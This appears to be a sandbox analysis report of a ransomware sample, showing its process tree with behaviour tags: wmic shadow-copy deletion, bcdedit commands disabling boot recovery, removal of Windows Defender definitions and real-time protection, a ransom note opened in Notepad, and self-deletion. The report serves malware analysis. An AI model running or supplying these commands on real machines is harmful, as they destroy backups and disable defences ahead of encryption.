C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1480 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3116 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:988 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:568 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:3496
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:3516 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:944
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2820 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:3788
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3904 -
C:\Windows\SYSTEM32\notepad.exenotepad.exe C:\n8pw_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
PID:3160 -
C:\Windows\SYSTEM32\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe"2⤵PID:3548
-
C:\Windows\system32\PING.EXEping.exe -n 5 127.0.0.13⤵
- Runs ping.exe
PID:3776
Network
MITRE ATT&CK Enterprise v6
Downloads